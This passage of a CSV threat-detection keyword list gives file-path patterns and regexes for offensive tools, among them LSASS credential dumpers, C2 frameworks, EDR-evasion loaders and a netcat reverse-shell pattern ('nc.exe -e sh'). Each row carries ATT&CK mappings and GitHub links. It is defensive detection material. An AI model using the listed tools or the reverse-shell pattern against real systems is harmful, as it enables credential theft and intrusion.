Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*\mipsel_agent*",".{0,1000}\\mipsel_agent.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*\MirrorDump.csproj*",".{0,1000}\\MirrorDump\.csproj.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*\MirrorDump.exe*",".{0,1000}\\MirrorDump\.exe.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*\MirrorDump.sln*",".{0,1000}\\MirrorDump\.sln.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*\MirrorDump\MinHook*",".{0,1000}\\MirrorDump\\MinHook.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*\MirrorDump\MiniDump\*",".{0,1000}\\MirrorDump\\MiniDump\\.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*\MirrorDump-master*",".{0,1000}\\MirrorDump\-master.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*\MITMRecorder.py*",".{0,1000}\\MITMRecorder\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*\Mockingjay_BOF.*",".{0,1000}\\Mockingjay_BOF\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","0","N/A","9","10","143","16","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z" "*\modifiableautorun.o*",".{0,1000}\\modifiableautorun\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*\Module_Stomping.py*",".{0,1000}\\Module_Stomping\.py.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "*\Modules\Backdoor.cs*",".{0,1000}\\Modules\\Backdoor\.cs.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*\monkey.exe *",".{0,1000}\\monkey\.exe\s.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*\monkey32.exe*",".{0,1000}\\monkey32\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*\monkey64.exe*",".{0,1000}\\monkey64\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*\Moriarty.exe*",".{0,1000}\\Moriarty\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\mortar\Lib\shell_loader.pas*",".{0,1000}\\mortar\\Lib\\shell_loader\.pas.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*\mouselogger.py*",".{0,1000}\\mouselogger\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\ms17-010.py*",".{0,1000}\\ms17\-010\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\msfnonstaged.exe*",".{0,1000}\\msfnonstaged\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\MSFRottenPotato.h*",".{0,1000}\\MSFRottenPotato\.h.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*\msfstaged.exe*",".{0,1000}\\msfstaged\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\Mshikaki.cpp*",".{0,1000}\\Mshikaki\.cpp.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","0","N/A","9","2","131","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z" "*\msi_search.c*",".{0,1000}\\msi_search\.c.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","3","232","26","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*\msi_search.exe*",".{0,1000}\\msi_search\.exe.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","3","232","26","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*\msi_search.ps1*",".{0,1000}\\msi_search\.ps1.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","3","232","26","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*\msi_search.x64.o*",".{0,1000}\\msi_search\.x64\.o.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","3","232","26","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*\msi_search.x86.o*",".{0,1000}\\msi_search\.x86\.o.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","3","232","26","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*\msol.py*",".{0,1000}\\msol\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\MSOL\DomainCompanyInfo.txt*",".{0,1000}\\MSOL\\DomainCompanyInfo\.txt.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*\mssql_priv.py*",".{0,1000}\\mssql_priv\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\MultiDump.c*",".{0,1000}\\MultiDump\.c.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*\MultiDump.exe*",".{0,1000}\\MultiDump\.exe.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*\MultiDump.sln*",".{0,1000}\\MultiDump\.sln.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*\MultiDump.vcxproj*",".{0,1000}\\MultiDump\.vcxproj.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*\MutationGate.cpp*",".{0,1000}\\MutationGate\.cpp.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","8","2","195","29","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z" "*\MutationGate.exe*",".{0,1000}\\MutationGate\.exe.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","8","2","195","29","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z" "*\MutationGate.sln*",".{0,1000}\\MutationGate\.sln.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","8","2","195","29","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z" "*\MutationGate.vcxproj*",".{0,1000}\\MutationGate\.vcxproj.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","8","2","195","29","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z" "*\mystikal.py*",".{0,1000}\\mystikal\.py.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","0","N/A","9","3","268","38","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z" "*\nanodump*",".{0,1000}\\nanodump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*\nanodump.py*",".{0,1000}\\nanodump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\nanorobeus-main.zip*",".{0,1000}\\nanorobeus\-main\.zip.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*\NativeDump.csproj*",".{0,1000}\\NativeDump\.csproj.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*\NativeDump.exe*",".{0,1000}\\NativeDump\.exe.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*\NativeDump.sln*",".{0,1000}\\NativeDump\.sln.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*\NativeDump\Program.cs*",".{0,1000}\\NativeDump\\Program\.cs.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*\nbnsspoof.py*",".{0,1000}\\nbnsspoof\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\nbtscan.py*",".{0,1000}\\nbtscan\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nc.exe * -e sh*",".{0,1000}\\nc\.exe\s.{0,1000}\s\-e\ssh.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\nc_srv.bat",".{0,1000}\\nc_srv\.bat","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*\net*\ftpagent.exe*",".{0,1000}\\net.{0,1000}\\ftpagent\.exe.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","10","10","81","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z" "*\net_4.0_32_RunasCs.exe*",".{0,1000}\\net_4\.0_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.0_32SharpDoor.exe*",".{0,1000}\\net_4\.0_32SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.0_32sharpfiles.exe*",".{0,1000}\\net_4\.0_32sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.0_64_RunasCs.exe*",".{0,1000}\\net_4\.0_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.0_64SharpDoor.exe*",".{0,1000}\\net_4\.0_64SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.0_64sharpfiles.exe*",".{0,1000}\\net_4\.0_64sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.0_Any_RunasCs.exe*",".{0,1000}\\net_4\.0_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.0_AnySharpDoor.exe*",".{0,1000}\\net_4\.0_AnySharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\net_4.0_Anysharpfiles.exe*",".{0,1000}\\net_4\.0_Anysharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release 